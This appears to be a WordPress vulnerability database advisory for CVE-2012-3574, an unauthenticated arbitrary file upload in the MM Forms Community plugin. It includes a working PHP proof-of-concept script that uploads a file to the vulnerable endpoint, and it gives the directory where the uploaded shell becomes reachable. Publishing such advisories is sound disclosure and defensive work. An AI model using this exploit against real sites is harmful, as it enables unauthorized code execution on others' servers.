MM Forms & MM Forms Community 2.2.6 - Unauthenticated Arbitrary File Upload



Description
Attackers have been seen probing for the "/wp-content/plugins/mm-forms/includes/doajaxfileupload.php" file.
Proof of Concept
PostShell.php

<?php

$uploadfile="lo.php";
$ch = 
curl_init("http://www.example.com/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : 

http://www.example.com/wp-content/plugins/mm-forms-community/upload/temp/
Filename : $postResult output

lo.php:

<?php
phpinfo();
?>

Affects Plugins

no known fix
- plugin closed
no known fix
- plugin closed

References

CVE 2012-3574
ExploitDB 18997

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Views 4378
Verified No
WPVDB ID 6510

Timeline

Publicly Published 2012-06-07 (about 8 years ago)
Added 2014-08-01 (almost 6 years ago)
Last Updated 2020-02-26 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin